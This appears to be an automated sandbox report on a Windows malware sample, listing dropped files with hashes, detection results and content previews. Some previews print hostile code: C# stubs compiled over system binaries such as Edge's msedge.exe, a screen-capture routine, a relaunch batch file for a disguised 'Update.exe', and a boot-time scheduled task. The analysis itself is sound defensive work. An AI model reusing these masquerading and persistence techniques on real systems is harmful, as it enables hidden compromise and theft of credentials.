MD5:	E13597674CDDBDBEB47AAD10CB8AC547
SHA1:	2F07E4C83C6C5B7B485255C39C2414958007325A
SHA-256:	A18836A4CCEBB7937611E6FC8B6607447AEF3D9986083E3E5760DFDF57572377
SHA-512:	24D658B87D5C830369E4EE1360F0A41DD668477A8179ACF573854EEA0397A486DE25924DABEA2A44752501A786B358083ACE2B5E478132185E73AF8D7E69D2F8
Malicious:	false
Preview:	BxbHYBzqg6WZ3Rzt9Zw44LSqj

C:\Users\user\AppData\Local\Temp\ntoifwit\ntoifwit.0.cs

Download File

Process:	C:\Users\user\AppData\Local\Temp\msAgentSavesmonitor\ChainComServermonitor.exe
File Type:	C++ source, Unicode text, UTF-8 (with BOM) text
Category:	dropped
Size (bytes):	382
Entropy (8bit):	4.878149255075571
Encrypted:	false
SSDEEP:	6:V/DBXVgtSaIb2Lnf+eG6L2F0T7bfwlxFK8wM2Lnf+eG6L2OptiFK8wQAv:V/DNVgtDIbSf+eBLZ7bfiFkMSf+eBLXP
MD5:	E78CF3910D8EC2D5FF70A2F42B8E364A
SHA1:	2F53847FD3903E626B07DCFCF33510292ADD27FC
SHA-256:	F46D4FEF2F5373D45F9F5EA63A67BB1C032081D463A7B26E7E5338704BD1AEB5
SHA-512:	FFB309CF50E95827FAAD1EB2402EB6BDC8766BAE88CF1F27609327745319315B1B72A9612B615AAEC1B34D561EC8313BD09E9A6C5EB4E552F59BA915978E5084
Malicious:	false
Preview:	.using System.Diagnostics;.using System.Threading;..class Program.{. static void Main(string[] args). {. new Thread(() => { try { Process.Start(@"C:\Windows\system32\SecurityHealthSystray.exe.exe", string.Join(" ", args)); } catch { } }).Start();. new Thread(() => { try { Process.Start(@"C:\Windows\Logs\SettingSync\cmd.exe"); } catch { } }).Start();. }.}.

C:\Users\user\AppData\Local\Temp\ntoifwit\ntoifwit.cmdline

Download File

Process:	C:\Users\user\AppData\Local\Temp\msAgentSavesmonitor\ChainComServermonitor.exe
File Type:	Unicode text, UTF-8 (with BOM) text, with no line terminators
Category:	dropped
Size (bytes):	251
Entropy (8bit):	5.004677520780692
Encrypted:	false
SSDEEP:	6:Hu+H2L//1xRT0T79BzxsjGZxWE8o923fJRb9:Hu7L//TRq79cQyBRb9
MD5:	8602B52C926F73F9C5F1498AFED2F5C9
SHA1:	2C9824A50FB541F945C608A01E83CB9F1F413118
SHA-256:	4699F66CDDD973869E85E05F2F2C00C63DD5C7951043B94CB6DC47BC57860461
SHA-512:	B8E5878F82E321BF5357F8861B555C2D181969858B1C01586F4B41FAE76146F771F85F4C38DF3358165BF74F42686B8972B0EA6023334E9A0C92F287CC280ADE
Malicious:	false
Preview:	./t:exe /utf8output /R:"System.dll" /R:"System.Threading.dll" /R:"System.Data.dll" /out:"C:\Windows\system32\SecurityHealthSystray.exe" /debug- /optimize+ /optimize+ /target:winexe /unsafe "C:\Users\user\AppData\Local\Temp\ntoifwit\ntoifwit.0.cs"

C:\Users\user\AppData\Local\Temp\ntoifwit\ntoifwit.out

Download File

Process:	C:\Users\user\AppData\Local\Temp\msAgentSavesmonitor\ChainComServermonitor.exe
File Type:	Unicode text, UTF-8 (with BOM) text, with very long lines (362), with CRLF, CR line terminators
Category:	modified
Size (bytes):	783
Entropy (8bit):	5.221784980534576
Encrypted:	false
SSDEEP:	24:KLC6MI/un/Vq79tyBRb4Kax5DqBVKVrdFAMBJTH:2CTN/Vq2MK2DcVKdBJj
MD5:	D20F67109384FD4FA79573F50A5DDC00
SHA1:	A94C09B47FCEFFEC64918E5017F878D3D7CD9491
SHA-256:	4C2B1A01EECFC5B92B0034AEF21185DAF716FBED68C8B0F7E3C572EC9D5B49A2
SHA-512:	8572B1E70BF3C7DD2A7C5795073FCCE9A71F1644027E9336C75245342E0BC0CEFCCB075ADA2BFBE48F231D64784B2019F8A36B0EE8B94854E142C4B215209EB4
Malicious:	false
Preview:	.C:\Users\user\AppData\Local\Temp\msAgentSavesmonitor> "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /t:exe /utf8output /R:"System.dll" /R:"System.Threading.dll" /R:"System.Data.dll" /out:"C:\Windows\system32\SecurityHealthSystray.exe" /debug- /optimize+ /optimize+ /target:winexe /unsafe "C:\Users\user\AppData\Local\Temp\ntoifwit\ntoifwit.0.cs"......Microsoft (R) Visual C# Compiler version 4.8.4084.0...for C# 5..Copyright (C) Microsoft Corporation. All rights reserved.......This compiler is provided as part of the Microsoft (R) .NET Framework, but only supports language versions up to C# 5, which is no longer the latest version. For compilers that support newer versions of the C# programming language, see http://go.microsoft.com/fwlink/?LinkID=533240....

C:\Users\user\AppData\Local\Temp\sirtu5ev\CSCD8A1CC3D1CE048959A397DAF8AF51474.TMP

Download File

Process:	C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
File Type:	MSVC .res
Category:	dropped
Size (bytes):	652
Entropy (8bit):	3.0872963249395955
Encrypted:	false
SSDEEP:	12:DXt4Ii3ntuAHia5YA49aUGiqMZAiN5gryK/qak7Ynqq3/bPN5Dlq5J:+RI+ycuZhNkqakSvbPNnqX
MD5:	A45DDB78A718B9F926806615FB0E5771
SHA1:	1B127D713A2A954D6734784B2532BC5C2440E21D
SHA-256:	01EA4F669751CFFD6FD37F307F231D0BA14750C8212B0C8D289CD05BEAB8ED09
SHA-512:	CC30EEC8305E5480CF8D61EDCDCEB307B0371B18CB949CC9ED915CADA28028DC4F16FF3967E0BF8DD60CE8A8B2EC6283F793E875C49E1A16B7BD8647A01153EC
Malicious:	false
Preview:	.... ...........................L...<...............0...........L.4...V.S._.V.E.R.S.I.O.N._.I.N.F.O.............................?...........................D.....V.a.r.F.i.l.e.I.n.f.o.....$.....T.r.a.n.s.l.a.t.i.o.n...............S.t.r.i.n.g.F.i.l.e.I.n.f.o.........0.0.0.0.0.4.b.0...,.....F.i.l.e.D.e.s.c.r.i.p.t.i.o.n..... ...0.....F.i.l.e.V.e.r.s.i.o.n.....0...0...0...0...<.....I.n.t.e.r.n.a.l.N.a.m.e...s.i.r.t.u.5.e.v...d.l.l.....(.....L.e.g.a.l.C.o.p.y.r.i.g.h.t... ...D.....O.r.i.g.i.n.a.l.F.i.l.e.n.a.m.e...s.i.r.t.u.5.e.v...d.l.l.....4.....P.r.o.d.u.c.t.V.e.r.s.i.o.n...0...0...0...0...8.....A.s.s.e.m.b.l.y. .V.e.r.s.i.o.n...0...0...0...0...

C:\Users\user\AppData\Local\Temp\sirtu5ev\sirtu5ev.0.cs

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	Unicode text, UTF-8 (with BOM) text, with CRLF line terminators
Category:	dropped
Size (bytes):	1004
Entropy (8bit):	4.154581034278981
Encrypted:	false
SSDEEP:	24:Jo4KMz04F03wykl4qk6oAuBGOUBrRmLW+7UCPa:Jo4hz0BAl4xBQ0XQCC
MD5:	C76055A0388B713A1EABE16130684DC3
SHA1:	EE11E84CF41D8A43340F7102E17660072906C402
SHA-256:	8A3CD008E86A3D835F55F8415F5FD264C6DACDF0B7286E6854EA3F5A363390E7
SHA-512:	22D2804491D90B03BB4B640CB5E2A37D57766C6D82CAF993770DCF2CF97D0F07493C870761F3ECEA15531BD434B780E13AE065A1606681B32A77DBF6906FB4E2
Malicious:	false
Preview:	.using System;..using System.Collections.Generic;..using System.Drawing;..using System.Windows.Forms;....public class Screenshot..{.. public static List<Bitmap> CaptureScreens().. {.. var results = new List<Bitmap>();.. var allScreens = Screen.AllScreens;.... foreach (Screen screen in allScreens).. {.. try.. {.. Rectangle bounds = screen.Bounds;.. using (Bitmap bitmap = new Bitmap(bounds.Width, bounds.Height)).. {.. using (Graphics graphics = Graphics.FromImage(bitmap)).. {.. graphics.CopyFromScreen(new Point(bounds.Left, bounds.Top), Point.Empty, bounds.Size);.. }.... results.Add((Bitmap)bitmap.Clone());.. }.. }.. catch (Exception).. {.. // Handle any exceptions here.. }.. }.... return results;..

C:\Users\user\AppData\Local\Temp\sirtu5ev\sirtu5ev.cmdline

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	Unicode text, UTF-8 (with BOM) text, with very long lines (606), with no line terminators
Category:	dropped
Size (bytes):	609
Entropy (8bit):	5.290590386120481
Encrypted:	false
SSDEEP:	12:p37Lvkmb6KOkqe1xBkrk+ikq4ufJUWZE24u7:V3ka6KOkqeFkqjJ1E2v
MD5:	AE3EDDD6618DC314CD23B69FE626E458
SHA1:	DC136913401E0FAD82EBB3828EF86DF3C36C61BD
SHA-256:	0276603BB7FECF8E04C698A6464DE36F75816E264E73EA9DD777557F994FF54D
SHA-512:	4227A7DFE43ECF5C446CB35892B993EABEE6DBCD7E971A063E2B750E7E3A501CAF1F21D4E5ED5374AC5AB28C2197FC2C6C958E1A1038F1C247FF505031A07592
Malicious:	false
Preview:	./t:library /utf8output /R:"System.dll" /R:"C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll" /R:"System.Core.dll" /R:"C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll" /R:"C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll" /out:"C:\Users\user\AppData\Local\Temp\sirtu5ev\sirtu5ev.dll" /debug- /optimize+ /warnaserror /optimize+ "C:\Users\user\AppData\Local\Temp\sirtu5ev\sirtu5ev.0.cs"

C:\Users\user\AppData\Local\Temp\sirtu5ev\sirtu5ev.dll

Download File

Process:	C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
File Type:	PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	4096
Entropy (8bit):	3.1568947667745793
Encrypted:	false
SSDEEP:	48:6Q7oEAtf0KhzBU/mIVf6mtJcfN00epW1ulkqa3vRq:ENz0mhmEfOLiqKv
MD5:	3B887E294C45CC6136F13B4B1CE0E71C
SHA1:	3A546E5060617BB087631EED3881B60E90AE4BE3
SHA-256:	CEEDF0CDCC6AA78A990FCD18929F970BFED064A044B6413539E0D30C18A61074
SHA-512:	031B370A363B235A279E004950C48A73E16F67DF41779B681BABE62E2F9E717D23C5E2FAC8504E3322ADF7B15A9662C0FB6DB4C549B2E8E11FD0DB39802397A6
Malicious:	true
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...?..f...........!.................&... ...@....... ....................................@..................................%..K....@.......................`....................................................... ............... ..H............text...$.... ...................... ..`.rsrc........@......................@..@.reloc.......`......................@..B.................&......H.......<!...............................................................0..........s.....(...........8...........o.......(......(....s........(..........(......(....s....~......(....o........,...o........o....t....o........,...o.......&.....X.......i?k.......(....B.(j........9.Q...........{.........(....BSJB............v4.0.30319......l.......#~..........#Strings............#US.........#GUID...........#Blob...........G.........%3............................................

C:\Users\user\AppData\Local\Temp\sirtu5ev\sirtu5ev.out

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	Unicode text, UTF-8 (with BOM) text, with very long lines (711), with CRLF, CR line terminators
Category:	modified
Size (bytes):	1151
Entropy (8bit):	5.473311148044137
Encrypted:	false
SSDEEP:	24:KLmg9Id3ka6KOkqeFkqjJ1E2WKax5DqBVKVrdFAMBJTH:2Z9kka6NkqeFkq11E2WK2DcVKdBJj
MD5:	36235BB83D1E370C20B532805145CD3A
SHA1:	5BF3E6579431ECDA4360A84F50F4DC7B76A5D6DA
SHA-256:	ED4EC85AC95822615FFF0DF5D83EB5AD71D0EFF451ED96F5266F4680E552A07D
SHA-512:	48809F5BB0863F1DF2B8DAE86CE5601DA98952FC48B16CD05251D1646863F4AA652AEE66329E39F0435C6F2F76E0DBE43C3F5934D07278851EA126BE903412D0
Malicious:	false
Preview:	.C:\Users\user\AppData\Local\Temp\..........> "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /t:library /utf8output /R:"System.dll" /R:"C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll" /R:"System.Core.dll" /R:"C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll" /R:"C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll" /out:"C:\Users\user\AppData\Local\Temp\sirtu5ev\sirtu5ev.dll" /debug- /optimize+ /warnaserror /optimize+ "C:\Users\user\AppData\Local\Temp\sirtu5ev\sirtu5ev.0.cs"......Microsoft (R) Visual C# Compiler version 4.8.4084.0...for C# 5..Copyright (C) Microsoft Corporation. All rights reserved.......This compiler is provided as part of the Microsoft (R) .NET Framework, but only supports language versions up to C# 5, which is no lon

C:\Users\user\AppData\Local\Temp\tmp744E.tmp.bat

Download File

Process:	C:\ProgramData\main.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	258
Entropy (8bit):	5.0390670222339
Encrypted:	false
SSDEEP:	6:QkEYDEnIBdGKoQRw+HG9U9aZ5MHPKw+Hs8E19aZ5MH6tuovn:QgPOKjm9pHMvk1EmHMO
MD5:	448F5D518B407BF20853055860781E26
SHA1:	07F587CE8D4CD8EDCC48E0080DD4FB3FA7EF129E
SHA-256:	6509FBDC3BED2E1B0798FE7AC6150AF90AAE62BFFA08C19178925FB9BA148ECA
SHA-512:	8AC7838C5A3EE7FCEC8483AE3BA059A5C368C2AF8141D819A78561F71FDE04639077CB2C64A73C5456B2984A1ED614173FD84DA962B9A57F7C9086F014E31B4E
Malicious:	false
Preview:	:l..Tasklist /fi "PID eq 7716" \| find ":"..if Errorlevel 1 (.. Timeout /T 1 /Nobreak.. Goto l..)..Cd "C:\Users\user\AppData\Roaming\GoogleChromeUpdateLog"..Timeout /T 1 /Nobreak..Start "" "C:\Users\user\AppData\Roaming\GoogleChromeUpdateLog\Update.exe"..

C:\Users\user\AppData\Local\Temp\ut1ljh4b\ut1ljh4b.0.cs

Download File

Process:	C:\Users\user\AppData\Local\Temp\msAgentSavesmonitor\ChainComServermonitor.exe
File Type:	C++ source, Unicode text, UTF-8 (with BOM) text
Category:	dropped
Size (bytes):	397
Entropy (8bit):	4.932739876435877
Encrypted:	false
SSDEEP:	12:V/DNVgtDIbSf+eBL6LzIfiFkMSf+eBLXptiFkD:JNVQIbSfhWLzIiFkMSfhNkFkD
MD5:	0288D740D07F9F332B5262CA3EA9E631
SHA1:	EC3BFBBDB420A9F7249118B7891F94683C1FB310
SHA-256:	A38DD69C5838DA44FA29E08B068F7A8EE5E556201920AB4608A4B9758F07A9AE
SHA-512:	DDEE43C84F20F211BA6F23DCF13398B683B5387BDD648A22590ABB8D15D61AF8C6DAB6063787BDC001FDC6F47A475EBCAC86E1615472A3181C67372AC035B2F2
Malicious:	false
Preview:	.using System.Diagnostics;.using System.Threading;..class Program.{. static void Main(string[] args). {. new Thread(() => { try { Process.Start(@"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe.exe", string.Join(" ", args)); } catch { } }).Start();. new Thread(() => { try { Process.Start(@"C:\Windows\Logs\SettingSync\cmd.exe"); } catch { } }).Start();. }.}.

C:\Users\user\AppData\Local\Temp\ut1ljh4b\ut1ljh4b.cmdline

Download File

Process:	C:\Users\user\AppData\Local\Temp\msAgentSavesmonitor\ChainComServermonitor.exe
File Type:	Unicode text, UTF-8 (with BOM) text, with no line terminators
Category:	dropped
Size (bytes):	266
Entropy (8bit):	5.158614828206481
Encrypted:	false
SSDEEP:	6:Hu+H2L//1xRf5oeTckKBzxsjGZxWE8o923fZ:Hu7L//TRRzscQyx
MD5:	6B0A9DEED9645E25A5627691B20CB317
SHA1:	7450233AFBCABC62590DBB5F32B40137C7EC34F6
SHA-256:	E1CB6CAAE93F8839702D97E267C645793A54FDA294CA32F04F3EF5F661DBA724
SHA-512:	71ADA7E45433DB68667831BA16B0D61ECD38B52F3C2CD51CFC7649FDCC4FDD7AFF31A69526ADAE8B5C3CCFAED69D47F0AA13EACA3376E84753B356AF14C3DFBE
Malicious:	true
Preview:	./t:exe /utf8output /R:"System.dll" /R:"System.Threading.dll" /R:"System.Data.dll" /out:"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" /debug- /optimize+ /optimize+ /target:winexe /unsafe "C:\Users\user\AppData\Local\Temp\ut1ljh4b\ut1ljh4b.0.cs"

C:\Users\user\AppData\Local\Temp\ut1ljh4b\ut1ljh4b.out

Download File

Process:	C:\Users\user\AppData\Local\Temp\msAgentSavesmonitor\ChainComServermonitor.exe
File Type:	Unicode text, UTF-8 (with BOM) text, with very long lines (377), with CRLF, CR line terminators
Category:	modified
Size (bytes):	798
Entropy (8bit):	5.257025275238661
Encrypted:	false
SSDEEP:	24:KLC6MI/un/VRzstyUKax5DqBVKVrdFAMBJTH:2CTN/VRzfUK2DcVKdBJj
MD5:	1FB8E49B2FEAE496EB3D6B74861075FA
SHA1:	91643BD317C3775563A1D637FE0E0DFC289A01D2
SHA-256:	EEF2644032A437A7FF95D064F4BAB5F2D34549222B3057654A7B7E160A1C63D6
SHA-512:	3DBE8CDFFB3690856E6DC49D7692BAC6F4B7526442A905915DD2AC606A1E69D6552856064D698DE7A81AEB44A7794BB1223335A91C3B7571CF737FE651D417B4
Malicious:	false
Preview:	.C:\Users\user\AppData\Local\Temp\msAgentSavesmonitor> "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /t:exe /utf8output /R:"System.dll" /R:"System.Threading.dll" /R:"System.Data.dll" /out:"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" /debug- /optimize+ /optimize+ /target:winexe /unsafe "C:\Users\user\AppData\Local\Temp\ut1ljh4b\ut1ljh4b.0.cs"......Microsoft (R) Visual C# Compiler version 4.8.4084.0...for C# 5..Copyright (C) Microsoft Corporation. All rights reserved.......This compiler is provided as part of the Microsoft (R) .NET Framework, but only supports language versions up to C# 5, which is no longer the latest version. For compilers that support newer versions of the C# programming language, see http://go.microsoft.com/fwlink/?LinkID=533240....

C:\Users\user\AppData\Local\Temp\wxyubnjmnlae.tmp

Download File

Process:	C:\ProgramData\setup.exe
File Type:	PE32+ executable (GUI) x86-64, for MS Windows
Category:	dropped
Size (bytes):	161792
Entropy (8bit):	5.8318794599287465
Encrypted:	false
SSDEEP:	3072:lQbW78Kb89UMmY8MA1cRWr7BiKcOO1Sf7lHn4mr3yo4f8P2:lQK75bobwfBiKCYfhHLU5
MD5:	1667C96053EAA078109F8B0C9500FC9D
SHA1:	E0F567763BAAAA757F66F96951D9810F45F69F30
SHA-256:	F7E1E53A6FB24A2BD9206305C59448A8F99B6F5847A6ACB18EB0FD9F7383FFB4
SHA-512:	6285ADE5CB85B71814EDD57EDDC512A031596043B7FCE4FCC909A0B78ECFE161C062AD0637EC82CBDAA36675AD32FBD0C94DDD96BB575BE8B1FBB47DF706AAE1
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 92%
Preview:	MZ......................@.......................................sr......!..L.!This program cannot be run in DOS mode....$.......K...............D.......D...........o...9A......9A9.....9A......Rich............PE..d....t.d.........."....%.....X......X".........@..........................................`..................................................8.......p..`>...`..8....................5..8............................................0...............................text............................... ..`.rdata.......0......."..............@..@.data........P......................@....pdata..8....`.......6..............@..@.rsrc...`>...p...@...8..............@..@........................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\yntnomxcupkb.xml

Download File

Process:	C:\ProgramData\setup.exe
File Type:	XML 1.0 document, ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	1490
Entropy (8bit):	5.1015990235428035
Encrypted:	false
SSDEEP:	24:2dk4+SkIMFWYL60YeGlMhEMjn5pwjpILUYODOLqx49RJh7h8gJ15E15LNEB86tn:cC3IQDL60uydbQ9IIYODOLqOdq2sbEx
MD5:	546D67A48FF2BF7682CEA9FAC07B942E
SHA1:	A2CB3A9A97FD935B5E62D4C29B3E2C5AB7D5FC90
SHA-256:	EFF7EDC19E6C430AAECA7EA8A77251C74D1E9ABB79B183A9EE1F58C2934B4B6A
SHA-512:	10D90EDF31C0955BCEC52219D854952FD38768BD97E8E50D32A1237BCCAF1A5EB9F824DA0F81A7812E0CE62C0464168DD0201D1C0EB61B9FE253FE7C89DE05FE
Malicious:	false
Preview:	<?xml version="1.0" encoding="UTF-16"?>..<Task version="1.3" xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task">.. <Triggers>.. <BootTrigger>.. . <Enabled>true</Enabled>.. </BootTrigger>.. </Triggers>.. <Principals>.. <Principal id="Author">... <RunLevel>HighestAvailable</RunLevel>.. </Principal>.. </Principals>.. <Settings>.. <MultipleInstancesPolicy>IgnoreNew</MultipleInstancesPolicy>.. <DisallowStartIfOnBatteries>false</DisallowStartIfOnBatteries>.. <StopIfGoingOnBatteries>false</StopIfGoingOnBatteries>.. <AllowHardTerminate>false</AllowHardTerminate>.. <StartWhenAvailable>false</StartWhenAvailable>.. <RunOnlyIfNetworkAvailable>false</RunOnlyIfNetworkAvailable>.. <IdleSettings>.. <Duration>PT10M</Duration>.. <WaitTimeout>PT1H</WaitTimeout>.. <StopOnIdleEnd>false</StopOnIdleEnd>.. <RestartOnIdle>false</RestartOnIdle>.. </IdleSettings>.. <AllowStartOnDemand>true</AllowStartOnDemand>.. <Enabled>true</Enabl

C:\Users\user\AppData\Roaming\GoogleChromeUpdateLog\Update.exe

Download File

Process:	C:\ProgramData\main.exe
File Type:	PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	5872348
Entropy (8bit):	7.487099220868339
Encrypted:	false
SSDEEP:	98304:nsl27OuKr+gvhf2U9Nzm31PMoslkqXf0FvUcwti78OqJ7TPBvc8X6UcR6s:nPOuK6mn9NzgMoYkSIvUcwti7TQlvciY
MD5:	3D3C49DD5D13A242B436E0A065CD6837
SHA1:	E38A773FFA08452C449CA5A880D89CFAD24B6F1B
SHA-256:	E0338C845A876D585ECEB084311E84F3BECD6FA6F0851567BA2C5F00EEAF4ECF
SHA-512:	DD0E590310392B0543D47A2D24D55F6F091BA59ACC0D7EA533039FFB48F1B8938587889BCFA19B0538A62BA26FCDE2172253860CEAB34AF40FD7BF65B6587B00
Malicious:	true
Yara Hits:	Rule: JoeSecurity_TelegramRecon, Description: Yara detected Telegram Recon, Source: C:\Users\user\AppData\Roaming\GoogleChromeUpdateLog\Update.exe, Author: Joe Security Rule: JoeSecurity_DiscordTokenStealer, Description: Yara detected Discord Token Stealer, Source: C:\Users\user\AppData\Roaming\GoogleChromeUpdateLog\Update.exe, Author: Joe Security Rule: JoeSecurity_MillenuimRAT, Description: Yara detected Millenuim RAT, Source: C:\Users\user\AppData\Roaming\GoogleChromeUpdateLog\Update.exe, Author: Joe Security Rule: JoeSecurity_CosturaAssemblyLoader, Description: Yara detected Costura Assembly Loader, Source: C:\Users\user\AppData\Roaming\GoogleChromeUpdateLog\Update.exe, Author: Joe Security Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: C:\Users\user\AppData\Roaming\GoogleChromeUpdateLog\Update.exe, Author: Joe Security Rule: JoeSecurity_TelegramRAT, Description: Yara detected Telegram RAT, Source: C:\Users\user\AppData\Roaming\GoogleChromeUpdateLog\Update.exe, Author: Joe Security
Antivirus:	Antivirus: ReversingLabs, Detection: 92%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L................."...0...Y...........Y.. ........@.. ........................Z...........`.................................l.Y.O.....Y.@.....................Y.......Y.8............................................ ............... ..H............text....Y.. ....Y................. ..`.rsrc...@.....Y.......Y.............@..@.reloc........Y.......Y.............@..B..................Y.....H.........X.. ...............W..........................................(......(......{...."..}......F.{....o....s.......2...{....o..../..{.....o.....s,......(....,.(........2...{....o....2..{.....o.....{......o......s,...v..(....,.(.......{.....o....2.{....o.......2...{....o....2...{.....o.....{.....o....>.{.....o....&...0..k.......s......{.....{....o....o.....{....o.....+&..(.......(....,...o[...oW...+...oW.....(....-...........o......*.......(.3[......>..s

C:\Users\user\Desktop\CyikYrPX.log

Download File

Process:	C:\Users\user\AppData\Local\Temp\msAgentSavesmonitor\ChainComServermonitor.exe
File Type:	PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	64000
Entropy (8bit):	5.857602289000348
Encrypted:	false
SSDEEP:	768:TDPfhHfT/9IvAgoeA2U7dtZLr6SWB6/BYklKbz4Xgs7RlkUC4M+JVvTkgny:TD3Jbf2UQoBYHfSRRRC4BvPny
MD5:	5EE7E079F998F80293B3467CE6A5B4AE
SHA1:	3C0932D48F3542E9DFB09AD9E1FF70891A038532
SHA-256:	A3AE7E97703E694C479E3B460F89C16B4A511626E351145532D1A2F3BA051779
SHA-512:	056F03CB02A8A994461A5A26C2D738EE39E5AE49462222AD4937DD1CB9F29C6567D2E368EFB7844E8779B3EB3EB5D87DACDE5E3D24DF8227194DDC2E0556FF8D
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 17%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d.........." ................N.... ... ....@.. .......................`......E.....@.....................................W.... .......................@....................................................... ............... ..H............text...T.... ...................... ..`.rsrc........ ......................@..@.reloc.......@......................@..B................0.......H...........\|...................................................................................................................................................................................7.pO`....<o ..F................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

C:\Users\user\Desktop\DhbSKVVV.log

Download File

Process:	C:\Users\user\AppData\Local\Temp\msAgentSavesmonitor\ChainComServermonitor.exe
File Type:	PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	38400
Entropy (8bit):	5.699005826018714
Encrypted:	false
SSDEEP:	768:bvTf5JA7rmkHDkK6/X7rpCA0U4oW+YcSNdb/deQoCDKmc:bTffImkjkK6/QAhaceb/dum
MD5:	87765D141228784AE91334BAE25AD743
SHA1:	442BA48B1B5BB158E2E6145B0592F81D20CB9C57
SHA-256:	9A121719F71383CF66FC36453679B36C8D24CC61EB335D0C304536E5D72AAAEB
SHA-512:	77FF7244F4E181A1F2B69A8814E1EFC0B7B55CD551B8D22F5A08039156295F6417D0E2E58265F1C07F8EA2BA3B24D9810B4B3E91B13943688C7450F736746657
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 9%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...c..d...........!..................... ........@.. ....................................@....................................O.................................................................................... ............... ..H............text...$.... ...................... ..`.rsrc...............................@..@.reloc..............................@..B........................H.......Dm...?..........<l......................................................................................................................................................................Q[..u.......;..................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

C:\Users\user\Desktop\FjOAgEaQ.log

Download File

Process:	C:\Users\user\AppData\Local\Temp\msAgentSavesmonitor\ChainComServermonitor.exe
File Type:	PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	50176
Entropy (8bit):	5.723168999026349
Encrypted:	false
SSDEEP:	768:7PCvZsxIexhaqgbv8yGk/A/4NPmAQeMeYzlP58gH8zGTCWxttXyZPM:7P4ZsxIelkY/O+DeuzYbM5xXiE
MD5:	2E116FC64103D0F0CF47890FD571561E
SHA1:	3EF08A9B057D1876C24FC76E937CDA461FAC6071
SHA-256:	25EEEA99DCA05BF7651264FA0C07E0E91D89E0DA401C387284E9BE9AFDF79625
SHA-512:	39D09DE00E738B01B6D8D423BA05C61D08E281482C83835F4C88D2F87E6E0536DDC0101872CBD97C30F977BC223DFAE9FCB3DB71DD8078B7EB5B5A4D0D5207A8
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 21%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d...........!..................... ........@.. ....................... .......e....@.....................................K.................................................................................... ............... ..H............text........ ...................... ..`.rsrc...............................@..@.reloc..............................@..B........................H............M...................................................................................................................................................................................Xg;.6.'.1. b9g................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

C:\Users\user\Desktop\FslAQrtN.log

Download File

Process:	C:\Users\user\AppData\Local\Temp\msAgentSavesmonitor\ChainComServermonitor.exe
File Type:	PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	39936
Entropy (8bit):	5.629584586954759
Encrypted:	false
SSDEEP:	768:tlPaJVGYXkJSMA2we8qlmau55wC1ND5kwcDl+y5X:chQZwalKdEfDld5
MD5:	D478E398EFCD2BD9BDBFEA958F7BEE4F
SHA1:	24CAA06949CDA52DB45F487EC2A8D3DE9C3FC1FC
SHA-256:	32E821193BE1D81BB3BE97F2719D28A0C7DD2E5BD94DC581D79A1497462EAC9B
SHA-512:	0705A42D2EE234D63DBE0A252A2048D85C817D8DF404EBFC12B583BF24AD84E111621727C7CB2369D1A22538354F725AADE067F0BDC4E2EBE2D61D937C130621
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 8%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d...........!................>.... ........@.. ....................................@....................................O.................................................................................... ............... ..H............text...D.... ...................... ..`.rsrc...............................@..@.reloc..............................@..B................ .......H........r..h?..........Lq..8....................................................................................................................................................................M..d..u7 ...jj.................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

C:\Users\user\Desktop\IibrXntG.log

Download File

